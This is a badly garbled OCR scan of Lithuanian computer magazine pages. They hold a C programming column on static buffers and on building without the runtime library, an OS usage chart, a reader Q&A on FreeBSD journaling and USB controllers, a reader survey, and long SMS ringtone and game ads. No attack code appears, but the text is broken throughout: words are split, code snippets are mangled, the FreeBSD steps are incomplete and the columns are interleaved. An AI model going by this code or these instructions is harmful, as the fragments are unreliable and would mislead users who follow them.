Ir savarankiškai! Tok 1nera būlina sekti 


prototipų, svarbiau 


nurodyti kompiliato: 


riui, kad jis funkcijas iškviestų pagal s/dcall 
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ies atsisakymas 
inčiai sveikos logikos požiūriu 


Krūvos (heap) ir dinaminės ati 
Programuotojų meilė dinaminei atm 


? nepaaiškinama niekuo kitu, kaip tik tamsybe. Krūva —tai stabdymi 
35) ir potencialūs nutekėjimai, apie kov: u kuriai rašytatiek, kad aš 
"o, net neaptarinėsiu šio klausimo 
J Ųų Hakeriai aktyviai Loja statinius masyv uriuo: acinė siste 


maišskiria dar bylos užkrovim 
ma/atlaisvinama kiekvieną kartą! Žvilgtelėkime į štai tok 
kurį galima aptikti net ir profesionali 


tadijoje, odinaminė atmintis išskiria: 


kietą' kodą 


programose 


(6har*s) 
p= malloc( (5) +1) 
(something goes wrong) 1 
free(p) 
val; 


Atrodytų, dinaminės atminties poreikį galima paaiškinti kintam 
moseilutėss dydžiu. Viskas čia būtų gerai, jei 
išėjimą iš funkcijos be jau išskirtos atminties atlaisvinimo 
Oštai „hakeriškas“ variantas, kuris vietoje heap naudoja statinę atmint 


funkcijai /() perduoda- 


elianti priešlaikin, 


p[ĮMAX POSSIBLE SIZE] 
(( (s)+1)> MAX POSSIBLE SIZE) 1 


(something goes wrong) 1 


val 


Mes padidinome našumą, atsikratėme nutekėjimo problemų, bet e funkciją 
nerentabilią. Praktikoje tai reiškia, kad čia nebus įmanoma panaudoti rekursijos (nors 
šiuo atveju mes iš anksto žinome, kad funkcija nėra rekursinė) vienu metu šią funkciją 
iškviesti iš dviejų ar daugiau srautų, priešingu atveju statiniame masyve susiformuos 
paprasčiausias duomenų jovalas, dėl ko ištiks krachas, kurio išvengti galima arba pasi- 
naudojus priverstine sinchronizacija (kritinės sekcijos, muteksai), arba per lokali Jto 
atmintį, kuri dar kitaip sutrumpintai vadinama TSL. Be; šiuolaikin 
kompiliatoriai ne visai sklandžiai dirba du tuo pačiu TSL, nė vienas sveikai mąstant 
hakeris nė už ką nenaudos šios galimybės 


vertinus 


Programavimas be RTL 

Pagal nutylėjimą C programos kompiliuojamos kartu su RTL (A 
Time Library) biblioteka, kuriužima daug kilobaitų ir užtikrinasprintf 
tipo funkcijų veikimą. Tačiau Windows NT jau pati turi RTL, kuri yra 
NTDLL.DDL bibliotekoje, tai kam gi mums tas dubliavimas? 
Norint programą sukompiliuoti be RTL, pakanka pagrindinę funkciją 
pavadinti ne main, o kaip nors kitaip, pavyzdžiui, start. Protingi lin 
keriai patys supras, kadtai — įėjimo taškas. Kvailiems (prie kurių ga 
lima priskirti ir MS LINKER,) įėjimo tašką reikia nurodyti akivaizdžiai 


in 


cl.exe /c file name.c/Ox 
link.exe file name.obj /ENTRY.:start/SUBSYSTEM:WINDOWS USER32 lib 


Lyginant programos dydžius su RTLirbe jos, mes praktiškai nematysime skirtumo, kadan 
gi minimalus 9x išlyginimo daugiklis yra 4 Kb; tokius nustatymus linkeris naudoja pagal nu 
tylėjimą. NTsistemoje minimalus daugiklis siekia viso labo 16 baitų, tačiau linkeris atsisako 
kompiliuoti tokią bylą, nebent mes apsimestumėm, kad kompiliuojame tvarkyklę (driver) 


link.exe file name „obj /ENTRY.:start USER32.lib /DRIVER /ALIGN:16 


Šiame pavyzdyje kompiliavimui naudojant MS VC 6 su RTL vykdomos bylos dydis siekia 
24,576Kb,beRTL—16,384 Kb, ir, galų gale, be RTLsuminimaliu išlyginimu —818 baitų 
Kaip sakoma, pajausk skirtumą! 
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"2 3946 


tume [08 panaudojimo riuose statistiką, si- 
S Iminų (4596) pasitiki 
mpatijų dalinasi Linux, Windows 


jalino sistemos, 


FreeBSD Kia 
r Solaris. Galiausiai likt 


Ž OpenBSD 
apie kurias tu galbūt nė A I EARN aiti 
Megasaugi sistema, kurioje klaidos surandamos labairetai. Vis dėlto diegti 
šios sistemos į apkrautus serverius niekas neskuba — ji lėtai veikia. 


1796 


1106 


AIX 
Sistema užsiima kompanija IBM, ji diegiama moksliniuose cen 
truose lygiagretiems skaičiavimams (branduolio lygyje r 
tas MPI (Message Passing Interface) protokolas) 


BSDi 
Tikra egzotika: komercinis x86 architektūrai skirtas distributyvas 
su aparatūros būklės stebėjimo funkcija 


alizUo 


94 
1946 
sco 
NetBSD Į šią kategoriją pateko dvi sistemos: FreeSCO (mažas 
Prieš porą metų buvo labai madinga sistema. Lengvai galima su- grindu sukurtas distributyvas) ir SCO Group d 
kišti į bet kokią geležį ir naudoti įvairiausiems eksperimentams panija, kuri dabar teisiasi su Linux kūrėjais) 
390 
246 
HP-UX8.Other 
Irix Į šią kategoriją įeina ir uždara HP-UX, ir „Apple'o“ MacOS, ir net 
Speciali sistema, veikianti su SGI geležimi. Naudojama trimatės senovinis su Alpha64 veikiantis DigitalUnix. Kotik nerasi aukštųjų 
grafikos ir vaizdo srautų apdorojimui mokyklų tinkluose! 
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Units/ 


PRIES UŽDUODAMAS KLAUSIMĄ PAGALVOK! 


MAN NEVERTA SIŲSTI KLAUSIMŲ, VIENAIP AR 


KITAIP SUSIJUSIŲ SU HAKINIMU/KREKINIMU, 
FRYKINIMU — TAM SKIRTAS HACK-FAG, TAIP 


NEVERTA UŽDAVINETI AKIVAIZDŽIAI LAMERIŠKŲ 
KLAUSIMŲ, ATSAKYMUS Į KURIUOS TUREDAMAS 


ŠIEK TIEK NORO GALI RASTI IR PATS. AŠNE 


TELEPATAS, TODEL KONKRETIZUOK KLAUSIMĄ 


IR ATSIŲSK KUO DAUGIAU INFORMACIJOS 


G: Girdėjau, kad į FreeBSD 6.1 siste- 
mą galima įdiegti žurnalizuojamą failų 
sistemą UFS2. Išrausiau visą sistemos 
dokumentaciją, tačiau taip nieko ir ne- 
radau. Kur gi čia šuo pakastas? 

abilias FreeBSD iš tiesų galima 
2gti pilnavertišką žurnalizuojamą failų sis- 
ą, Tiesa, OS teks šiek tiek palopyti, tačiau, 
ė, tai padaryti gana paprasta. Taigi apie 
ąišeilės: . ; 

1.Prieš pradėdant patį pataisymų įdiegimą 
reikia pasiruošti. Užeik į katalog 
jame sukurk reikiamus katalogus 


Hmkdir sbin/geor i 


usr/srC ir 


rnkdir je0m/journal 


2.Tada galima parsisiųsti 
pakeistiisistemą: 


3. Potarekomnendiojama perkompiliuoti dalį 


os, tam reikia iš 
src/include, 


lės užeiti į katalogus 
/sbin/geom/class 
bin/mount/ ir įvykdyti išganingąją ko: 
mandų seką „make; make install; make clean 
4.Pridėjusį branduolio konfigą eilutę „options 
GJOURNAL“, 'perkompiliuojame bran- 


Jusr/si 


S 
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i) 
š 


PAT 


duolį (www. surgutnet.ru/pagę.php?id=9). ir 
perkrauname mašiną 
5. Dabar reikia užkrauti specialų modulį, kas 
daroma su komanda 


Hajournal load 


6. Norint žurnalą prijungti prie tam tikros par- 
ticijos, ją reikia prieš lai demontuoti. -Kaip pa- 
vyzdį paimkime/dev/ad0s3d, ovietoje monta- 
vimotaško —/mnt/ufs2tes! 


7. Metas prijungti žurnalą 


8.Primontuojame particiją, kuri dabar jau yra 
su prijungtu žurnalu 


Hrmount 


Viskas! 


) async,gjournal /dev/adū! 


G: Mano senutė, tačiau stabili motini- 
nė neturi nei USB 2.0, nei FireWire. Kas 
man lieka: susitaikyti su esama situa- 
cija ir naudotis stabdančiu USB 1.1 (ir 
1 Gb iš fotoaparato atminties kortelės 
siųstis pusę dienos) ar nepagailėti litų 
naujai motininei plokštei? O kito vari- 
anto nėra? 

A: Be abejonės, geriau būtų susimąstyti apie 
motininės plokštės atnaujinimą. Juk jeigu 
nėra USB 2.0, tai tau grės ir kiti apribojimai 
(pavyzdžiui; nebus SATA valdiklio). Tačiau 
tiesą sakant, galima apsieiti ir be motininės 
pakeitimo. Dabar'už viso labo 10-15 dolerių 
galima nusipirkti PCI valdiklį, kuriame bus ir 
USB 2:0, ir FireWirė lizdai. Tokie valdikliai Vei- 
kia nepriekaištingai ir daugeliu atvejų net ne- 
feikalauja tvarkyklių imo. O SATA diską 
bus galima prijungti pasinaudojus perėjimu 
iš SATA/IDE į USB 2.0 (tektų dar papildomai 
išleisti 20-40 žaliųjų prezidentų). Informaciją 
apie tokį kol kas dar 
adresu Atip://thg.ru/storage/pata ide sala 
usb/onepage.html. 


įrenginį gali rasti 
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| Elitinio 


“ HAKERIŲ KLUBO 


nariams taikomo 


Interneto klube „IMPRESS“ 
su ELITE CLUB nario kortele 
suteikiama 20 96 nuolaida! 


IRECESĖS 


Kaunas, Savanorių pr. 255, 
(HYPER MAXIMA) 


Pateikus ELITE CLUB 
kortelę visose BMS 
parduotuvėse suteikiama 
5 96 nuolaida. 


ELITE CLUB 
*004L8415b 


GOLDEN-MENBER 


B; OAI06 


EA TA SALES 


HAKERIŲ KLUBAS 


Savanorių pr. 66 
Tel.: (37) 75 10 10 
El. paštas: kaunas(Obms.lt 


BMS MEGAPOLIS, 

Savanorių pr.301 

Tel.: (37) 313101 

El. paštas: megapolisObms.lt 


BMS MEGAPOLIS, 

Laisvės pr. 2 

Tel.: (5) 24 77 300 

El. paštas: v.megapolistObms.lt 


Minijos g. 2 
Tel.: (46) 38 33 33 
El. paštas: klaipeda(Obms.lt 


Vardas į p Kitame numeryje norėčiau rasti: 
Pavardė | 0 E 
Amžius) |- | 
Adresas a | 
Ė B 
El.paštas š 


Išvardink tris, tavo manymu, 
įdomiausius šio numerio straipsnius: 
Z 


ir tris prasčiausius: 


[ 
| 
| 
| 


[4 


Tavo klausimas į FAG: 


siųsti | išvalyti | 


p.d. 2234, LT -44012, KAUNAS - C 


Naudojiesi kompiuteriu 
metus 

Naudojiesi internetu 

| metus 

Kiek žurnalo numerių skaitei? 

| 2 numerius 


Kokią OS naudoji? 


40-0J0 NUMERIO 
NUGALETOJAS: 


LAURYNAS SLIVINSKAS 
IŠ VILNIAUS RAJ. 


JAM ATITENKA MICRO- 
SOFT WIRELESS OPTICAL 
KLAVIATURA IR PELE. 


LAIMĖTOJO PRAŠOM 
PASKAMBINTI Į 
REDAKCIJĄ IR SUSITARTI 
DĖL PRIZO ATSIĖMIMO. 


ngzB9b 
sąlarepaNts | 


Sprogsta burbulai, vyksta kon- 
kursai r valgymo varžybos! Dalyviai 
avo pamėgti flmukų herojai 


TOP ŽAIDIMAI 
Kodas: 213849660 


Valdai serialo "Vienakart Kalifor- 
nijoje" pasaulį Išsirink veikėją, ir 
gyvenk pilnaverįį jo gyvenimą. 


KS) T610, T630, 2530 


Kodas: 226209660 


Tingiam katinui Garfildui reikės 

pajudėti, juk dingo jo draugas — 

šuniukas Odis. Tau reiks gerai 

pasukti galva! 

NOKIA 2650, 3100, 3200, 3220, 3300, 5100, 

5140. 5140. 6920, 6021, 6030, 6100, 6230 
280, 6510 6800. 7210, 7250, 7260 

SONY ERICSSON Ki K/60 


: 236259660 


Pagrindinis žaidimo 
herojus — priešistorinė voverė 
labiau už viską mėgsta gilės 

3200, 3220, 3300, 3510. 
6021, 6030, 6100, 6101 


Bl g, 


Jei tu visada svajojai auginti šunį, 
betiki šiol neturėjai galimybės 
tai žaidimas "Mobidog" sukurtas 
tau! Įsigyk šuniuką ir Užaugink jį 
NOKIA 22650, 3100, 3200, 3220 3300, 5100 
5140, 5140, 8020, 6021, 5030, 100 6230 

30, B280 6510, 6800 7210 7250. 7250 
7370 7610 SONY ERICSSON kū), K750 


Jei svajoji dalyvauti 

realybės šou, išmėgink 

jėgas virtualioje. 

negyvenamoje saloje. 

NOKIA 2650 3100, 3200, 3300, 28 

5140, 6020, 021, 8030, 6101, 6720, 6230,6233 
6260, 6270, 6280 6810 7210 7250, 7280. 7610 
3800 SONY ERICSSON K300i K750, 


Įsitikinkite, kad įjungta ir veikia GPRS paslauga. Žinutę su žaidimo kodu nusiųskite į numerį 


62879660 


SPALVOTI ATVIRUKAI 


173719660 
o 


Lu 


124139660 


Moki valdyti naikintuvą? Nieko 
baisaus - Išmokysim! Po apmo- 
kymų tavęs laukia karo misijos: 

žvalgyba, kova su ateivių laivais. 


NOKIA 3220, 5140, 5140, 6020, 6021. 6030 
6230, 6230, 6233, 6260, 6280. 7260, 7270, 
7610, 8800 SONY ERICSSON K300i K750. 


Kodas: 186849660 


Automobiliais galima pasiekti 
neliikėtiną greit! Gražuolės prie 
finišo linijos jau laukia tavo pergalės! 


NOKIA 2650, 3100, 3200 3220 300 4510, 5100 
5140, 6020, 6100, 6103, 6111, 5240 6230, 6233, 
6260, 8270, 6260 6610 6800 7210 7250, 7280 
Taka, 1610 SONY ERICSSON: 510. K750, 
Tė10. 63, 2530 


sLaSN 3 


122219660  227059660 
57 


241369660 


207649660 185589660 


215249660 


207639660 221459660 


207629660 
A 


235648660 


225359660 


241319660 
TI 


2 


Įsitikinkite, kad įjungta ir veikia telefono GPRS paslauga. Žinutę su spalvoto atviruko kodu nusiųskite į numerį 
Gaukite žinutę su nuoroda, iš kurios atsidarykite spalvotą atviruką. 


NOKIA 2650, 3100, 3200, 32 


1300, 3510, 3 


J, 3650, 5100, 5140, 6020, 6021, 8030, 6060, 6100. 6103, 6 
7610, 7650. SIEMENS A6O, A65, A75, AX75, C60, Cs, CF75, MS5, MCSO, 565, SL55, SL65 SAMSUNG 


6230, 


8600, 6810, 6800, 7210, 7250, 7250i, 7200, 7270, 
:200, C210, C230, X120, X140, X200, X300, X450, X460, X480, 


XB00, X620, X640, X660, XB70, E300, E530, E630, E700, E710, E730, E760, E800, E820, P510. SONY ERICSSON T610, 1630, K300i, K510i, K7001, J300i, W800 


ATVIRUKAI LOGOTIPA 
online "GEŽŲ!!! HACKER BADGAY cRiMiNaL bin 
“ LU 224589660 222449660 172309660 154049660 
168829660 107369660 41579660 PLAYER GH A Š [A "Zl 
3Žaė R 140329660 | 133609660 89660 226419660 
Į ė 
su ut XT 
47619660 241789660 = 205669660 1259660 15609660 1249660 2 
Bl. ING TELE2. | Garis: CSX 
28) NY TS O 769660 231449660 222329660 
222789660 | 217449660 3439660 “iki GDUMA+ GA BRIGADA 
19659 EEB 206429660 220519660 69660 222439660 
36619660  Eaovoėno 148039660 Ž- 
Nes VALYMO PRIEMONĖ 
Ares E TELEFONO EKRANUI 
214139660 55569660 237029660 Nusiųsk kodą 63009660 į numerį 
Tek 7 4 ES] Tu gausi TUŠČIĄ LOGOTIPĄ 
ATIOKI Nė FUN Dėmesio! Tik NOKIA telefonams 
218309660 = 217539660  183659660 Id 


Žinutę su kodu nusiųskite į mūsų numerį 
NOKIA 1100, 2100, 2600 3210, 3310, 2410, 3330, 3510, 5210, 
8210, 8310. 6510, 8as0, 8690. Tik atvirukai 3250, 6070, 6101. 6 


Tore 6 2004 Para 


E pens 


SIEMENS telefonams prie kodo pridėkite raidę S (pvz., 3689660s). 
10 (k logotipai), 5510. 6020, 6021, 6030, 6050, 6210, 6310, 6310i, 6510, 7110 (Ik logotipai). 7270. 7610, 

8233, 6270. 7200, 7360 SIEMENS ASS, A65, AT5, AX7S, C56, C60, C65, CX75, CXV70, M55, 555, 
SL55. SAMSUNG C100, C200, C210, X120, X450, X480. P730. Ti atvirukai X560. SONY ERICSSON Tik atvirukai: J300i, K300, K700i, WB0O. 


Gi Gai o sed Aso Ursa GT are rema! Gormoloh in I US andor other countries 
S Gama Erno US, ania Ginas Euninos 
Aa ana Aaziin Iremaonai I AB gs reserved 


Gartokds Day Out 
Šianani B Go 63 
Ieu Age 20 2005 Fox 


VOKALINĖS MELODIJOS 


James Brown: I Feel Good 120239660 
Skambina! Dziin! Dziin! 167719660 
Jurga: Aš esu tiktai jei tu esi 221609660 
Dainelė: Trjam trjam 145029660 
Mamyte, pakelk ragelį! 181619660 
Jurga: Laisvė 237789660 
LT United: We Are The Winners 234379660 
LT United: Fashion Show 240439660 
Jurga: Kai pamirši tu mane 237809660 
A. Mamontovas: Liūdesio angelas 221579660 
Mėsa: Meilė trise 237779660 


Įsitikinkite, kad telefone įjungta ir veikia GPRS paslauga. 
Nusiųskite žinutę su vokalines melodijos kodu į numerį 


20 
SIEMENS 055 SL65 NOKIA 8104, 61 6060, 6230, 6233, 6200, 
270, 6280, 7260, 7270, 7280 7360, 7370. 610 8800, NšO. SONY ERICSSON K700, W80, K600i, K510 


"ToP mELoBINOS T mono | roli 


Lordi: Hard Rock Hallelujah 225829660 225829660p 
Outcast: Idlewild Blues 243769660 243769660p 
Iš k.f. „Krikštatėvis“ 121739660 121739660p 
Shakira: Timor 233869660 233869660p 
Mokinukės: Maža širdelė 242139660 242139660p 
Raketa: Dolčė Gabana 223169660 223163660p 
Shakira: La Tortura 165108660 165109660p 
Robbie Williams: Rudebox 242279660 242279660p 
Toklo Hotel: Rette Mich 217359660 217359660p 
Andrius Rimiškis: Laimė šalia 240189660 240189660p 
Mino: Be meilės mirt galiu 184219660 184219860p 
The Pussycat Dolis: I Don't Need a Man 2421198660 242119660p 
James Brown: I Feel Good 83139660  83139860p 
Mino ir Vilija: Vivo Per Lei 181639660 181639660p 
LT United: Fashion Show 240369660 240369660p 
Shakira feat. W. Jean: Hips Don't Lie 218689660  218689660p 
Joe Dassin: Et si tu n'existas pas 142769660 142763660p 
US5: Just Because Of You 215703660 215709660p 
Red Hot Chili Peppers: Tell Me Baby 237669660 237663660p 
69 Danguje: Superlenktynės 242149660 242143660p 
Supermode: Tell Me Why 240289660  240289660p 
Juanes: A Dios Le Pido 227429660 227429680p 
US5: Come Back To Me Baby 215719660 215719660p 
Pakito: Living On Video 215769660 215769660p 
Madonna: Hung Up 181448660 181449660p 
Reamonn: Tonight 240269660 240269680p 
Rytis Cicinas: Meilės laivas 106149660 106149860p 
Fllpsyde feat. Piper: Happy Birthday 225659660 225659660p 
Beyonce: Deja Vu 242069660 242069660p 
Cascada: Everytime We Touch 240359660 240359660p 
LT United: We Are The Winners 213009660  213009660p 
Sergey Shnurov: Iš filmo "Bumeris" 64009660  64003660p 
Andrius Rimiškis: Kartais būna 233729660 233729660p 
69 Danguje: 9 Dangui 210629660 210629660p 
Geltona: Mintys 240339660 240339660p 
SIUNTINUKAS DRAUGUI 

Pat kosS odaikarpai D padauoos peirukoj 

ims Bt 
Įsitikinkite, kad telefone įjungta Ir veikia GPRS paslauga. 
Žinutę su kodu (pvz., 3689660p) siųskite į mūsų numerį 
NOKIA 2650 3100, 3200, 3220, 3250, 3300, 351 8020, 8021, 6030, 6080, 6070, 100, 6101 6103 811, 181 


6230, 6233 6260, 6270, B280, 6600, 6610. 6800 7210, 1, 7280, 7360, 370, 7610, T650, 8800, NB0. 
„SAMSUNG C100, C200 C g D800, DėdO, X100, Xi20, X140, X200, X300, XAS0, XAsO, X480, X500, XB00 
X620, XB40, X860, X670, E300, E330, E360, E530, E000, EG30, ETO, E710, 720, E760, EBO0, Ek20, E900, P510 P730, 
2530. 2300 2500, 2540, 2540. SIEMENS A60, A65, ATS, AXTS, CS5, OB0, CBS, C75, C185, CFXGS CFT5, ČKTS, CXVTO, 
Ms, Nes, MTS MOS, S65,S85, 5056, SLES. SONY ERICSSON T610, T630, K300, KTOO, 300, 800, Ksūti, KS101 


Žinutę su kodu siųskite į numerį 

SIEMENS telefonams prie kodo pridėkile raidę S (pvz., 3689660s) 

NOKIA 1100. 2100 3210, 3310, 3410, 3330, 5210, 5510, 6210, 6310,6310i, 6510, 7110, 8210, 8310, 8610, 
2450. 8800. SAMSUNG R200c R210s, SIEMENS AS, A52. C45, 545, ME45, MSO, MT50 


Norėdami užsisakyti GPRS paskambinkite savo operatoriui: 1566 - Omnitel, 1501 - Bitė GSM, 
2. Kad gautumėte NOKIA (išskyrus 3220. 5140. 6020, 6021, 6030, 6060, 6070, 6103, 6111 
0. 6233, 6270. 6260. 7260. 7270, 7280, 7360, 7370, 8800, NB0) arba SAMSUNG (išskyrus 
10, E360, E530, E720, E730. E800, Dš00, D800, X500, X660, X670, Z300, Z500, 2540) 
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y 


RM o : 
VASARA BAI < 


ž = 
Melodijos 
NAUJOS TOP 5 
Gnarls Barkley / Crazy 


Bob Sinclair 
Beyonce/De Ja Vu 
Justin Timberla 
Red Hot Chili Pepper 


World, Hold On 


* dejavu1 


telimė 


e/Se; 


K 


Moo 


NAUJOS MELODIJOS 


Holly Doly / Dolly Song 
Justin Timberlake / Sexyback 

Red Hot Chill Peppers/Dani California 
James Blunt / Wiseman 

Robbie Wiliams/Sin Sin Sin 


doly 
Sexy 
danic 
wisema 
sinsin 


Pearl Jam / Unemployable 
Pearl Jam / World Wide Suicide Wide 


unemploy 


X 
LINKSMIMKIS SOLIAUSU AKA! 


Paris Hilton / Stars Are Blind starsarė 


VASAROS MELODIJOS 


Crazy Frog / Popcom. 
Daddy Yankee / Gasolina 


Juanes / La Camisa Negra 


Popcorn 
gasolina. 
camisa 


ATB / 9 PM -Till I Con 


kodas 


Opmtill 
ameri 


Sunblock ft. Robin Beck / First Time first 
TAT.U. / Friend Of Foe frie 


A 
Eminem / When I'm Gone 


POPULIARIOS MELODIJOS 


50 Cent / JustA Lil Bit 

Gnaris Barkley / Crazy 

Shakira / Hips Don't Lie 

Benassi Bros ft. Dhany / Every Single Day „ 


RUSIŠKI HITAI Lia 


Cepėra / Boane nova T806r0 
Bneoraue A. Arash / BOcTO4Hbie GKa3K4 


3sepu / lo cKopoA BCTpeNK " 
aprel 


chemyglaza 
ludiivna 
Inostranet 
nevino 


LT United / Fashion Show 
1 Andrius Mamontovas / Viskas Iš Naujo 


Antis / Zombiai 


2 Ė (0) Rasa r Jonas / Teka Saulė teka 


aumų Aleksandras Makėjevas / Tėvelis tevelis“ 


vodoo People 


ą Hello (Good To Be Back) 


zombi 


vozlė 
vostochnye 
skoroi 


Scootei hellogoo 


whenimgone 
|kodas J 

parasyk 
ciulba 


tenkur 
waters 


justali 
crazyl 
hips 
everysing 


Hory caeno / Anpeno 
A. Myry 6 A. Tne6sy / Uėpmbie rasa 
TA.TU. / NNoaw vuBanwAsi 

Banepyi Menanae / AKocrpaneų 


Ga 1He ara 
Nūmynoa | O06pHa He amosaran mp 


boroboro 
ecsta 


SEL / Parašyk Man Laišką Iš Paryžiaus 
Rasa ir Jonas/Čiulba Ulba 

Lemon Joy/ Ten, Kur Mylėjau 
Land / You Take The Waters (su Taja) 


Benassi Bros ft. Dhany / Hit My Heart 
Arash / Boro, Boro 
ATB / Ecstasy A 


1 


Kacwuw / Te6e Nlonpasuron ponravitsa 
ostanus 
krasavitsa 
lalai 


vosem 


theweekend 
finalcou 
allaboutu 
myhumpsht 


Kauna Opuox / la na na 
Pyku Baepx / 18 Mie Yxe 


7 


South Park 

Nu, Pogodi! 

Misija: Neįmanoma 
Simpsonai 


Runų ŽAS Ir Sadūnai / Lietuvaičiai Žygin Eina lietu 
b Dr. Green / (Tavo nugaroj) Kablys tavo 
Jurga / Nebijok š 
Lemon Joy / Ten Kur Mylėjau 
POPULIARIOS 
Europe / The Final Countdown 
a TAU. / All About Us 


G Natas! ('Dangus' ) Pirma Valanda 
a ma; 
z Rasa ir Jonas / Čiulba Ulba (I Svaras) "gb. 
Michael Gray / The Weekend 
Black Eyed Peas / My Humps A 


southpar 
nupogodi 

mission 
simpsons 


hotelcalit 
arash 
bday 


The Eagles / Hotel California 
Arash feat. Helena / Arash 
Flipside Feat. Piper / Happy Birthday 


iijUnited!/We/Arejrhe) Winners] 


Crazy Frog / Pinocchio 
ES Shakira / Whenever, Wherever 


i 


Užknisa tavo skambučiai 
Afigienai 
Ruri Ruri 


E 


pino 
whenever 


Seksas Ir miestas 
Žavūs ir drąsūs 


sexandtheci 
boldandthe 


Colin McRae 
Rally 2005 


Siųsk sms: 


Robin Hood 
S Defender Of 
The Crown 


Siųsk sms: 


Gali Lai 
Jūros Piratų 


"Pirates dainai“ 


Siųsk sms: EXEGAME pirates 


Kariai — pk! veelė tomis, kurio 
ištroškę aukso, žiovės bei nuotykių, Tačiau Gyvenimas 


Siųsk sms: Ą 


akt mažas sAytas lavūkšis 3u besj 
toti išplaukė | jūrą, O Mu pastapčiomis Įsinkai + M 
pasislėpus lr kisaikvapiančių dažų, 


Wallbraker 2 


Siųsk sms 


Sweet Invaders 


Siųsk sms 


i 


Madagascar, 
| A = Going Wild 


Siųsk sms. 


Et: 


Jodie Marsh NM MMM 
< PhotoShoot IEF J 
Siųsk sms. 


| 
L 


Siųsk sms: 


GoodFellas 


Siųsk sms: 


| Black Shark4 


Siųsk sms: 


SWAT Force 


Siųsk sms. 


Spalvoti paveiksliukai 
JAVA žaldimai r polloninės melodijos tinka 


šia =ž . aa . . i * 
Spalvoti paveiksliukai 
Rašyk SMS: EXEI KODAS, siųsk numeriu 1321 


Nusiųsk draugui: EXEI KODAS 37O0XXXXXXX 


Gausi žinutę su nuoroda, iš kurios atsidarysi savo užsakymą 


EXEI fingero EXEI piratesk 


A iki 
Rašyk SMS: EXEANI KODAS, slųsk numeriu 1328 


Kaina 3 Lt. Pvz.: exeani shell 
įsk draugui: EXEANI KODAS 37OXXXXXXX 


OMNITEL, BITĖS Ir TELE2 abonentams, 
siųnčiate žinutę draugui, mokėsite pats 
vžsakymui Unka 
dauguma žinomų Nokla, Motorola, Alcatel 
16, Samsung, Siemens Ir Sonykri 
modelių, kurie groja polloninės melodija 


4 k | 


r—“ 


Ro 


slems Nok 
modeliams, 

tinka tiems NOKIA, MOTOROLA, SAMSUNG, 
SIEMENS Ir SONY ERICSSON telefonų 
modeliams, Kurie atkuria mp3 lormatą 
(pasiikrinkite sav 


EXEI white EXE! giratie EXE lion2 


EXE carū3 


EXEI sunsetstalion | EXEI fono! 1 EXEI fono12 


EXEANI elephant 


EXEANI yai3101 


dauguma žinomų Nokia, M 
LG, Samsung, Siemens Ir SonyEricsson 


t A 
m į 


sa | LS 


ML 


modelių su spalvotu ekanu, 

užsklandos tinka tiems teletonų 
modelams NOKIA, MOTOROLA, SAMSUNG, 
SIEMENS Ir SONY ERICSSON „kurie 
suderinti animuotiems | paveiksilukams 
pasitkrinite savo telefono specifikacijas) 


EXEI sunsetpalms 


EXEI pb291 EXEI pb293 * 


EXEANI piggy. 


Kilus klausimams 


